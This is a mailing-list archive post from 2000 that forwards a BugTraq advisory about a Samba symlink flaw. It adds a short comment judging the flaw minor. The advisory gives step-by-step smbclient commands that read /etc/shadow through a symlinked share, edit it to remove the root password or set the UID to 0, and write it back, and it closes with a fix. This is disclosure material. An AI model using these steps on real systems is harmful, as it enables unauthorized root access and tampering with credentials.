BugTraq Post: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
Scott Gifford
sgifford at tir.com
Fri Dec 15 05:54:17 GMT 2000
This was posted to BugTraq earlier today; thought I'd put a copy here
in case anybody hadn't seen it.
I don't think that this "attack" is particularly surprising.
Basically, he is leveraging a Samba "admin user" account into a UNIX
root account, using a symlink (created from a shell) to get outside of
the share.
It seems to me like a "leveraging root to get root" attack, but I
guess if somebody had fileserver admins that were less trusted than
their UNIX admins, it could be an issue.
------ScottG.
From: Tozz <tozz at HACKERS4HACKERS.ORG>
Subject: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
To: BUGTRAQ at SECURITYFOCUS.COM
Date: Thu, 14 Dec 2000 00:17:51 +0100
Reply-To: Tozz <tozz at HACKERS4HACKERS.ORG>
Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
=================================================================
Requirements:
* Shell access or any other way to create symlinks
* A running samba deamon
* The username and/or password of a user named in the
admin lists in one or more shares.
* Brains are not required.
By default, Samba (http://www.samba.org) followes symlinks, which can lead
to
root promises. Here is an example:
I have a guy that sorts out all my uploads through SMB, he has 'admin'
access
(admin users = username).. This means he will work as UID 0 (root).
e.g. we have this share in /etc/smb.conf
[uploads]
path = /home/ftp/incoming
comment = Uploads that came through anon ftp
guest ok = no
writeable = no
force create mode = 0755
force directory mode = 0755
admin users = warezmaster
Login to the shell, or find some other way to create symlinks
and create a symlink in /home/ftp/incoming
you do something like
ln /etc -s
now type on you're box (local or remote works both):
smbclient file://foobar.com/uploads -U warezmaster
it will ask for a password, enter it and you will get something like
smb\:>
There we go
smb\:>cd etc
smb\:>get shadow
smb\:>exit
[root at embrace /root]
now you downloaded the shadow file on you're localbox
edit it, change you're UID to 0, or remove the password
from the root account (no password required at logon)
login with smbclient again
smbclient file://foobar.com/uploads -U warezmaster
enter the password
and reupload
smb\:>cd etc
smb\:>put shadow
smb\:>exit
that's it, now login to the shell, if you changed you're own uid
you are now root. If you removed the password from root account
just su to it and you wont need a password.
Note:
The 'Follow Symlinks' can be turned off, but it's on by default.
Fix:
Disable Follow Symlinks
Bye,
Tozz (tozz at hackers4hackers.org)
You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz
or MemoServ me when I'm not online.
More information about the samba-technical
mailing list